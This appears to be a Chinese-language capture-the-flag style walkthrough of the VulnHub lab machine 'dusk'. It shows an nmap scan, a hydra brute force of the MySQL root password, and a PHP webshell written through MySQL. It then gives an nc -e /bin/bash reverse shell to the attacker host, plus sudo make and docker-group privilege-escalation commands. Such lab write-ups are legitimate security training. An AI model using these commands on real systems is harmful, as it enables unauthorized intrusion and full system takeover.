vulnhub靶场,dusk
环境准备
靶机下载地址:https://www.vulnhub.com/entry/sunset-dusk,404/
攻击机:kali(192.168.109.128)
靶机:dusk(192.168.109.180)
下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式
信息收集
使用arp-scan确定目标靶机
确定目标靶机IP为192.168.109.180
使用nmap扫描查看目标靶机端口开放情况
nmap -Pn -sV -p- -A 192.168.109.180
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-20 17:01 CST
Nmap scan report for 192.168.109.180
Host is up (0.0013s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp pyftpdlib 1.5.5
| ftp-syst:
| STAT:
| FTP server status:
| Connected to: 192.168.109.180:21
| Waiting for username.
| TYPE: ASCII; STRUcture: File; MODE: Stream
| Data connection closed.
|_End of status.
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 b5:ff:69:2a:03:fd:6d:04:ed:2a:06:aa:bf:b2:6a:7c (RSA)
| 256 0b:6f:20:d6:7c:6c:84:be:d8:40:61:69:a2:c6:e8:8a (ECDSA)
|_ 256 85:ff:47:d9:92:50:cb:f7:44:6c:b4:f4:5c:e9:1c:ed (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: dusk.dusk, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING,
| ssl-cert: Subject: commonName=dusk.dusk
| Subject Alternative Name: DNS:dusk.dusk
| Not valid before: 2019-11-27T21:09:14
|_Not valid after: 2029-11-24T21:09:14
|_ssl-date: TLS randomness does not represent time
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
3306/tcp open mysql MySQL 5.5.5-10.3.18-MariaDB-0+deb10u1
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.3.18-MariaDB-0+deb10u1
| Thread ID: 38
| Capabilities flags: 63486
| Some Capabilities: Support41Auth, SupportsCompression, Speaks41ProtocolOld, SupportsLoadDataLocal, FoundRows, IgnoreSpaceBeforeParenthesis, SupportsTransactions, IgnoreSigpipes, LongColumnFlag, ConnectWithDatabase, Speaks41ProtocolNew, ODBCClient, InteractiveClient, DontAllowDatabaseTableColumn, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
| Status: Autocommit
| Salt: O1HURz3*w>k%o#\)TMf9
|_ Auth Plugin Name: mysql_native_password
8080/tcp open http PHP cli server 5.5 or later (PHP 7.3.11-1)
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 00:0C:29:DA:B8:CA (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: dusk.dusk; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 1.33 ms 192.168.109.180
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.14 seconds
开放端口:21、22、25、80、3306、8080
先试试以匿名用户登入ftp看看有什么东西
直接连接不上,放弃这个端口
浏览器访问目标靶机80端口
就是apache的默认网站,没有发现什么
使用dirb对网站进行目录结构扫描
没扫出来啥有用的页面
可以看到对方还开启了8080端口,也为http服务
浏览器访问目标靶机8080端口
给出了当前网站下的文件和网站工作目录:/var/tmp
查看这些文件也没有发现什么利用的地方
渗透过程
80端口和8080都没有办法进行利用,通过信息收集发现对方还开启了mysql服务器,尝试使用暴力破解
hydra -l root -P /usr/share/wordlists/rockyou.txt -t 50 mysql://192.168.109.180
成功破解出数据库密码,进入数据库进行查看
mysql -h 192.168.109.180 -uroot -ppassword
show databases;
use mysql;
show tables;
select * from user;
但是也没有发现有什么有用的信息
查看一下数据库是否有读写的权限
当secure_file_priv为空,就可以读取磁盘的目录。
当secure_file_priv为G:\,就可以读取G盘的文件。
当secure_file_priv为null,load_file就不能加载文件。
说明现在是具有全部文件的写入权限的,前面通过8080端口发现了网站的工作目录为:/var/tmp
,所以可以去使用mysql的写入权限向网站工作目录写入一句话木马
使用浏览器访问木马文件查看是否写入成功
可以看到在网站根目录下面多了一个php文件,说明木马写入成功了
使用蚁剑进行连接
尝试反弹shell
kali终端:nc -lvvp 4444
蚁剑终端:nc -e /bin/bash 192.168.109.128 4444
可以看到kali这边成功反弹回来一个shell
权限提升
查看当前用户的sudo命令
直接上提权网站查询方法
COMMAND='/bin/sh'
sudo -u dusk make -s --eval=$'x:\n\t-'"$COMMAND"
成功切换为dusk用户,查看dusk用户的sudo命令
没有dusk用户的密码,不能查看,查看一下dusk用户的id
发现dusk用户是属于docker组的,再次上提权网站查询方法
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
成功获得root权限,切换至其root目录,成功获得flag,靶机dusk渗透结束